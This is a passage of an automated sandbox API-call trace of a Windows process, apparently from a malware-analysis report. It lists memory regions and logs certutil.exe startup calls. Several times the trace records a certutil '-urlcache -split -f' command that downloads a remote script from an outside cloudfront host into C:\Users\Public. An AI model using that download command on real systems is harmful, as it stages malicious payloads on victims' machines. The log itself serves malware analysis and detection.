start_va = 0x7ffb34cc0000
end_va = 0x7ffb34f33fff
entry_point = 0x7ffb34cc0000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll")
Region:
id = 1138
start_va = 0x7ffb3a460000
end_va = 0x7ffb3a4b3fff
entry_point = 0x7ffb3a460000
region_type = mapped_file
name = "wintrust.dll"
filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")
Region:
id = 1139
start_va = 0x4d31b30000
end_va = 0x4d31b3ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000004d31b30000"
filename = ""
Region:
id = 1140
start_va = 0x4d338c0000
end_va = 0x4d33abffff
entry_point = 0x0
region_type = private
name = "private_0x0000004d338c0000"
filename = ""
Region:
id = 1141
start_va = 0x4d33ac0000
end_va = 0x4d33ebffff
entry_point = 0x0
region_type = private
name = "private_0x0000004d33ac0000"
filename = ""
Thread:
id = 98
os_tid = 0xce8
[0041.945] GetStartupInfoW (in: lpStartupInfo=0x4d316bf7f0 | out: lpStartupInfo=0x4d316bf7f0*(cb=0x68, lpReserved="", lpDesktop="", lpTitle="certutil.exe -urlcache -split -f https://dl6zxn23r8r14.cloudfront.net:443/en-US C:\\Users\\Public\\en-US.js ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x7ff6bb0343d9, hStdError=0x0))
[0041.948] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff6baf50000
[0041.948] __set_app_type (_Type=0x1)
[0041.948] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff6bb034a70) returned 0x0
[0041.948] __wgetmainargs (in: _Argc=0x7ff6bb098ed8, _Argv=0x7ff6bb098ee0, _Env=0x7ff6bb098ee8, _DoWildCard=0, _StartInfo=0x7ff6bb098ef4 | out: _Argc=0x7ff6bb098ed8, _Argv=0x7ff6bb098ee0, _Env=0x7ff6bb098ee8) returned 0
[0041.949] _onexit (_Func=0x7ff6bb03cda0) returned 0x7ff6bb03cda0
[0041.949] _onexit (_Func=0x7ff6bb03cec0) returned 0x7ff6bb03cec0
[0041.949] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb3d260000
[0041.950] GetProcAddress (hModule=0x7ffb3d260000, lpProcName="WerSetFlags") returned 0x7ffb3d266390
[0041.950] WerSetFlags () returned 0x0
[0041.950] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0041.950] __iob_func () returned 0x7ffb3cf9e210
[0041.950] _fileno (_File=0x7ffb3cf9e240) returned 1
[0041.950] _setmode (_FileHandle=1, _Mode=16384) returned 16384
[0041.951] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437"
[0041.951] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437"
[0041.951] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437"
[0041.951] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437"
[0041.951] GetConsoleOutputCP () returned 0x1b5
[0041.955] _vsnwprintf (in: _Buffer=0x4d316bf760, _BufferCount=0xb, _Format=".%d", _ArgList=0x4d316bf688 | out: _Buffer=".437") returned 4
[0041.955] _wsetlocale (category=2, locale=".437") returned="English_United States.437"
[0041.956] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24
[0041.956] GetFileType (hFile=0x24) returned 0x2
[0041.956] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb3d260000
[0041.956] GetProcAddress (hModule=0x7ffb3d260000, lpProcName="SetThreadUILanguage") returned 0x7ffb3d27d550
[0041.956] SetThreadUILanguage (LangId=0x0) returned 0x409
[0041.965] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2
[0041.965] GetCommandLineW () returned="certutil.exe -urlcache -split -f https://dl6zxn23r8r14.cloudfront.net:443/en-US C:\\Users\\Public\\en-US.js "
[0041.965] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x4d318e4570
[0041.965] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2
[0041.965] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x4d318e3f10
[0041.965] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x4d318e4330
[0041.965] LocalFree (hMem=0x4d318e3f10) returned 0x0
[0041.965] LocalFree (hMem=0x4d318e4570) returned 0x0
[0041.965] LocalFree (hMem=0x0) returned 0x0
[0041.966] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0
[0041.966] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff6baf5eb70
[0041.966] _wgetenv (_VarName="WinDir") returned="C:\\Windows"
[0041.966] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x104, lpBuffer=0x4d316befd0, lpFilePart=0x4d316befc0 | out: lpBuffer="C:\\Windows", lpFilePart=0x4d316befc0*="Windows") returned 0xa
[0041.966] GetTempFileNameW (in: lpPathName="C:\\Windows", lpPrefixString="cert", uUnique=0x0, lpTempFileName=0x4d316bf1e0 | out: lpTempFileName="C:\\Windows\\cerCF51.tmp" (normalized: "c:\\windows\\cercf51.tmp")) returned 0xcf51
[0041.967] DeleteFileW (lpFileName="C:\\Windows\\cerCF51.tmp" (normalized: "c:\\windows\\cercf51.tmp")) returned 1
[0041.967] getenv (_VarName="WinDir") returned="C:\\Windows"
[0041.968] GetCommandLineW () returned="certutil.exe -urlcache -split -f https://dl6zxn23r8r14.cloudfront.net:443/en-US C:\\Users\\Public\\en-US.js "
[0041.968] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x4d318e43c0
[0041.968] GetSystemTime (in: lpSystemTime=0x4d316bf410 | out: lpSystemTime=0x4d316bf410*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x4, wDay=0xf, wHour=0x12, wMinute=0x1d, wSecond=0x1a, wMilliseconds=0x11b))
[0041.968] SystemTimeToFileTime (in: lpSystemTime=0x4d316bf410, lpFileTime=0x4d316bf408 | out: lpFileTime=0x4d316bf408) returned 1
[0041.968] FileTimeToLocalFileTime (in: lpFileTime=0x4d316bf408, lpLocalFileTime=0x4d316bf3d0 | out: lpLocalFileTime=0x4d316bf3d0) returned 1
[0041.968] FileTimeToSystemTime (in: lpFileTime=0x4d316bf3d0, lpSystemTime=0x4d316bf140 | out: lpSystemTime=0x4d316bf140) returned 1
[0041.968] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0x4d316bf140, lpFormat=0x0, lpDateStr=0x4d316bf250, cchDate=128 | out: lpDateStr="2/16/2018") returned 10
[0041.968] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0x4d316bf140, lpFormat=0x0, lpTimeStr=0x4d316bf150, cchTime=128 | out: lpTimeStr="5:29 AM") returned 8
[0041.968] _vsnwprintf (in: _Buffer=0x4d316bf15e, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0x4d316bf128 | out: _Buffer=" 26.283s") returned 8
[0041.969] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x4d318ec480
[0041.969] _vsnwprintf (in: _Buffer=0x4d316bf1d8, _BufferCount=0xb, _Format="%d", _ArgList=0x4d316bf1c8 | out: _Buffer="948") returned 3
[0041.969] LoadStringW (in: hInstance=0x7ff6baf50000, uID=0x3b4, lpBuffer=0x4d316befa0, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5
[0041.971] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x4d318e2990
[0041.971] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x4d318dc130
[0041.971] LocalFree (hMem=0x4d318ec480) returned 0x0
[0041.971] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x4d316bf490 | out: lpSystemTimeAsFileTime=0x4d316bf490*(dwLowDateTime=0xe8a95f75, dwHighDateTime=0x1d3a68a))
[0041.971] GetLocalTime (in: lpSystemTime=0x4d316bf4b8 | out: lpSystemTime=0x4d316bf4b8*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x1d, wSecond=0x1a, wMilliseconds=0x12a))
[0041.971] SystemTimeToFileTime (in: lpSystemTime=0x4d316bf4b8, lpFileTime=0x4d316bf488 | out: lpFileTime=0x4d316bf488) returned 1
[0041.971] CompareFileTime (lpFileTime1=0x4d316bf488, lpFileTime2=0x4d316bf490) returned 1
[0041.972] _vsnwprintf (in: _Buffer=0x4d316bf500, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0x4d316bf458 | out: _Buffer="GMT + 11.00") returned 11
[0041.973] LocalFree (hMem=0x4d318e43c0) returned 0x0
[0041.973] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffb23a70000
[0041.973] FindResourceW (hModule=0x7ffb23a70000, lpName=0x1, lpType=0x10) returned 0x7ffb23b28090
[0041.973] LoadResource (hModule=0x7ffb23a70000, hResInfo=0x7ffb23b28090) returned 0x7ffb23b280b0
[0041.973] LockResource (hResData=0x7ffb23b280b0) returned 0x7ffb23b280b0
[0041.973] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2
[0041.973] _vsnwprintf (in: _Buffer=0x7ff6bb09beb0, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0x4d316bf538 | out: _Buffer="10.0.10240.16384") returned 16
[0041.973] GetACP () returned 0x4e4
[0041.973] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff6bb062678, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7
[0041.973] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x4d318e29b0
[0041.973] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff6bb062678, cbMultiByte=-1, lpWideCharStr=0x4d318e29b0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7
[0041.973] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x4d318ec6c0
[0041.973] _vsnwprintf (in: _Buffer=0x4d318ec6c0, _BufferCount=0x17, _Format="%ws %ws", _ArgList=0x4d316bf588 | out: _Buffer="10.0.10240.16384 retail") returned 23
[0041.974] LocalFree (hMem=0x4d318e29b0) returned 0x0
[0041.974] LocalFree (hMem=0x0) returned 0x0
[0041.974] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffb21cd0000
[0041.974] GetACP () returned 0x4e4
[0041.974] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff6bb062678, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7
[0041.974] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x4d318e29b0
[0041.974] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff6bb062678, cbMultiByte=-1, lpWideCharStr=0x4d318e29b0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7
[0041.974] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x4d318ec580
[0041.974] _vsnwprintf (in: _Buffer=0x4d318ec580, _BufferCount=0x17, _Format="%ws %ws", _ArgList=0x4d316bf588 | out: _Buffer="10.0.10240.16384 retail") returned 23
[0041.974] LocalFree (hMem=0x4d318e29b0) returned 0x0
[0041.974] LocalFree (hMem=0x0) returned 0x0
[0041.974] GetACP () returned 0x4e4
[0041.974] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff6bb062678, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7
[0041.974] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x4d318e29b0
[0041.974] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff6bb062678, cbMultiByte=-1, lpWideCharStr=0x4d318e29b0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7
[0041.974] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x4d318ec9c0
[0041.974] _vsnwprintf (in: _Buffer=0x4d318ec9c0, _BufferCount=0x17, _Format="%ws %ws", _ArgList=0x4d316bf5b8 | out: _Buffer="10.0.10240.16384 retail") returned 23
[0041.974] LocalFree (hMem=0x4d318e29b0) returned 0x0
[0041.974] LocalFree (hMem=0x4d318ec6c0) returned 0x0
[0041.974] LocalFree (hMem=0x4d318ec580) returned 0x0
[0041.974] LocalFree (hMem=0x4d318ec9c0) returned 0x0
[0041.974] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0041.974] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0041.974] GetStockObject (i=0) returned 0x1900010
[0041.974] RegisterClassW (lpWndClass=0x4d316bf6e0) returned 0xc17c
[0041.974] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff6baf50000, lpParam=0x0) returned 0x6016e
[0041.980] NtdllDefWindowProc_W (hWnd=0x6016e, Msg=0x24, wParam=0x0, lParam=0x4d316bf0a0) returned 0x0
[0041.981] NtdllDefWindowProc_W (hWnd=0x6016e, Msg=0x81, wParam=0x0, lParam=0x4d316bf050) returned 0x1
[0041.983] NtdllDefWindowProc_W (hWnd=0x6016e, Msg=0x83, wParam=0x0, lParam=0x4d316bf0c0) returned 0x0
[0041.987] UpdateWindow (hWnd=0x6016e) returned 1
[0041.987] PostMessageW (hWnd=0x6016e, Msg=0x400, wParam=0x0, lParam=0x4d318d1946) returned 1
[0041.987] GetMessageW (in: lpMsg=0x4d316bf730, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x4d316bf730) returned 1
[0041.987] TranslateMessage (lpMsg=0x4d316bf730) returned 0
[0041.987] DispatchMessageW (lpMsg=0x4d316bf730) returned 0x0
[0041.987] NtdllDefWindowProc_W (hWnd=0x6016e, Msg=0x31f, wParam=0x1, lParam=0x0) returned 0x0
[0041.987] GetMessageW (in: lpMsg=0x4d316bf730, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x4d316bf730) returned 1
[0041.987] TranslateMessage (lpMsg=0x4d316bf730) returned 0
[0041.987] DispatchMessageW (lpMsg=0x4d316bf730) returned 0x0
[0041.988] LocalAlloc (uFlags=0x0, uBytes=0xba) returned 0x4d318d8c40
[0041.988] LocalAlloc (uFlags=0x0, uBytes=0xcc) returned 0x4d318d4610
[0041.988] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="p", cchCount2=-1) returned 3
[0041.988] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 3
[0041.988] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="p", cchCount2=-1) returned 3
[0041.988] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="split", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 3
[0041.988] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="f", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1
[0041.988] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="f", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1
[0041.988] _vsnwprintf (in: _Buffer=0x4d316bf1a8, _BufferCount=0xb, _Format="%d", _ArgList=0x4d316bf198 | out: _Buffer="465") returned 3
[0041.988] LoadStringW (in: hInstance=0x7ff6baf50000, uID=0x1d1, lpBuffer=0x4d316bef70, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc
[0041.988] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x4d318e43c0
[0041.988] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0
[0041.988] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff6baf5eb70
[0041.988] getenv (_VarName="certsrv_rawhex") returned 0x0
[0041.988] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2
[0041.988] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2
[0041.988] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11
[0041.988] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10
[0041.989] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13
[0041.989] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15
[0041.989] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0
[0041.989] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2
[0041.989] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2
[0041.989] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11
[0041.989] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10
[0041.989] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13
[0041.989] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15
[0041.989] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0
[0041.989] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2
[0041.989] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2
[0041.989] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11
[0041.989] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10
[0041.989] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13
[0041.989] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15
[0041.989] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0
[0041.989] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0x4d316bebf8 | out: phkResult=0x4d316bebf8*=0x0) returned 0x2
[0041.992] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff6bb044b00, dwGroupId=0x7) returned 0x0
[0041.996] CryptRegisterOIDInfo (pInfo=0x4d316bf120, dwFlags=0x0) returned 1
[0041.997] CryptRegisterOIDInfo (pInfo=0x4d316bf120, dwFlags=0x0) returned 1
[0041.997] CryptRegisterOIDInfo (pInfo=0x4d316bf120, dwFlags=0x0) returned 1
[0041.997] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 3
[0041.997] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 3
[0041.997] lstrcmpW (lpString1="urlcache", lpString2="uSAGE") returned -1
[0041.997] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3
[0041.997] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3
[0041.997] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="", cchCount2=-1) returned 3
[0041.997] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3
[0041.997] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 3
[0041.997] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3
[0041.997] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 3
[0041.997] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="", cchCount2=-1) returned 3
[0041.997] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="deny", cchCount2=-1) returned 3
[0041.997] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="resubmit", cchCount2=-1) returned 3
[0041.997] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="setattributes", cchCount2=-1) returned 3
[0041.997] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="setextension", cchCount2=-1) returned 3
[0041.997] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="revoke", cchCount2=-1) returned 3
[0041.997] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="isvalid", cchCount2=-1) returned 3
[0041.997] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="", cchCount2=-1) returned 3
[0041.997] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="getconfig", cchCount2=-1) returned 3
[0041.997] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="getconfig2", cchCount2=-1) returned 3
[0041.997] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="getconfig3", cchCount2=-1) returned 3
[0041.997] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="ping", cchCount2=-1) returned 3
[0041.997] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="pingadmin", cchCount2=-1) returned 3
[0041.997] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="CAInfo", cchCount2=-1) returned 3
[0041.997] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="CAPropInfo", cchCount2=-1) returned 3
[0041.997] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="ca.cert", cchCount2=-1) returned 3
[0041.997] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="ca.chain", cchCount2=-1) returned 3
[0041.997] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="GetCRL", cchCount2=-1) returned 3
[0041.997] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="CRL", cchCount2=-1) returned 3
[0041.997] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="shutdown", cchCount2=-1) returned 3
[0041.997] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="installCert", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="renewCert", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="schema", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="view", cchCount2=-1) returned 1
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="db", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="deleterow", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="backup", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="backupDB", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="backupKey", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="restore", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="restoreDB", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="restoreKey", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="exportPFX", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="importPFX", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="dynamicfilelist", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="databaselocations", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="hashfile", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="store", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="enumstore", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="addstore", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="delstore", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="verifystore", cchCount2=-1) returned 1
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="repairstore", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="viewstore", cchCount2=-1) returned 1
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="viewdelstore", cchCount2=-1) returned 1
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="UI", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="TPMInfo", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="attest", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="getcert", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="", cchCount2=-1) returned 3
[0041.998] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="urlcache", cchCount1=-1, lpString2="ds", cchCount2=-1) returned 3
